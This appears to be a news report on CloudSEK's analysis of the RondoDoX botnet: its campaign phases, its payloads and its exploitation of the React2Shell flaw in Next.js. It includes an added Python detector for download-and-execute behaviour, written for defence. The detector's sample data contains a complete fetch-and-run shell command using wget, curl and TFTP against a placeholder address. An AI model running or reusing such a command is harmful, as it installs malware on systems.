Analysis of exposed command-and-control (C2) logs from March to December 2025 revealed how the threat actors evolved their attacks, shifting from probing common web vulnerabilities to deploying full-fledged malware operations.
The campaign recently escalated as the attackers began exploiting the newly disclosed React2Shell vulnerability affecting Next.js Server Actions.
Darktrace first reported live exploitation of React2Shell on December 10, 2025. Within three days, CloudSEK observed the RondoDoX group switching to fresh infrastructure and continuing their attacks using updated C2 servers and payloads.
The group demonstrated remarkable agility, integrating the latest vulnerabilities into their toolset almost immediately after public disclosure, reflecting a high level of automation and adaptation.
CloudSEK’s Threat Research and Information Analysis Division (TRIAD) confirmed that the campaign unfolded in three primary phases.
The first phase, running between March and April 2025, involved manual reconnaissance and vulnerability testing targeting platforms such as WebLogic, along with probing for SQL injection and command execution.
By April, the second phase had begun, characterized by automated web exploitation across content management systems such as WordPress, Drupal, and Apache Struts2.
During this period, the threat actors also expanded to IoT ecosystems, focusing on routers and network devices through abused diagnostic commands.
The third phase, beginning in July 2025, saw the emergence of dedicated RondoDoX botnet infrastructure and large-scale infection waves. Logs from the compromised servers confirm persistent automated deployment activity, with hourly exploitation attempts by December.
At least six C2 servers were identified, each responsible for distributing separate malware variants and controlling infected systems across multiple geographies.
The latest stage of this campaign leverages the React2Shell vulnerability in Next.js Server Actions. Attackers initiated blind remote code execution testing on December 8, 2025, followed by full weaponization a few days later.
Once a server was confirmed vulnerable, the threat actors executed Node.js commands to download and launch payloads from their active C2 infrastructure.
The downloaded binaries, internally referred to as “nuts” payloads, included a Linux coinminer named “poop,” a persistent loader and system enforcer called “bolts,” and an IoT-specific Mirai variant labeled “x86.”
These payloads support multiple architectures, including x86, ARM, and MIPS, and use fallback delivery methods such as wget, curl, and TFTP to ensure stable deployment.
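As an added illustration of the download-and-launch behaviour described above (not code from CloudSEK or the original report), the following Python detector scans constructed process-creation records for a Node.js parent spawning a shell that chains the wget/curl/TFTP fallback fetch with an execute step; the record format, field names and the sample address are assumptions.

```python
"""
Detection helper: flag process-creation records (e.g. auditd execve or an EDR feed)
in which a Node.js process spawns a shell that fetches a payload with the fallback
fetchers named in the report (wget, curl, tftp) and then executes it.
The record shape and the sample lines are constructed for this example.
"""
import re
from dataclasses import dataclass

FETCHERS = ("wget", "curl", "tftp")
# Shell operators that chain a fallback fetch with a later step (|| / && / ;).
CHAIN_OPS = re.compile(r"\|\||&&|;")
# A chmod +x, a ./binary invocation, or "sh <file>" after the fetch.
EXEC_STEP = re.compile(r"(chmod\s+[+0-7]*x|\./\S+|\bsh\s+\S+)")


@dataclass
class Event:
    parent: str   # parent process image, e.g. "node"
    cmdline: str  # full command line of the spawned process


def fetchers_used(cmdline: str) -> list[str]:
    """Return each distinct fetcher utility that appears as a command word."""
    lowered = cmdline.lower()
    return [f for f in FETCHERS if re.search(rf"(?<![\w/]){f}\b", lowered)]


def is_download_and_execute(ev: Event) -> bool:
    """True when a node-parented shell fetches a payload and runs it (or tries
    several fetchers in sequence, the fallback pattern the report describes)."""
    if not ev.parent.lower().startswith("node"):
        return False
    fetchers = fetchers_used(ev.cmdline)
    if not fetchers:
        return False
    chained = bool(CHAIN_OPS.search(ev.cmdline))
    return chained and (bool(EXEC_STEP.search(ev.cmdline)) or len(fetchers) >= 2)


def scan(events: list[Event]) -> list[Event]:
    """Return only the events that match the download-and-execute pattern."""
    return [ev for ev in events if is_download_and_execute(ev)]


# Constructed sample records; 198.51.100.10 is a documentation (TEST-NET-2) address.
SAMPLE_EVENTS = [
    Event("node", "sh -c 'cd /tmp; wget http://198.51.100.10/x86 || "
                  "curl -O http://198.51.100.10/x86 || tftp -g -r x86 198.51.100.10; "
                  "chmod +x x86; ./x86'"),
    Event("node", "sh -c 'npm run build'"),
    Event("node", "sh -c 'curl -s https://api.example.invalid/health'"),
]

if __name__ == "__main__":
    for ev in scan(SAMPLE_EVENTS):
        print("ALERT:", ev.cmdline)
```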
The ongoing activity highlights the growing convergence between web application exploitation and IoT botnet operations.
CloudSEK has advised organizations to immediately patch all vulnerable Next.js applications, harden IoT environments, and block known malicious IP addresses associated with the RondoDoX botnet to prevent further compromise.
The post RondoDoX Botnet Actively Weaponizes Critical React2Shell Flaw for Malware Deployment appeared first on Cyber Security News.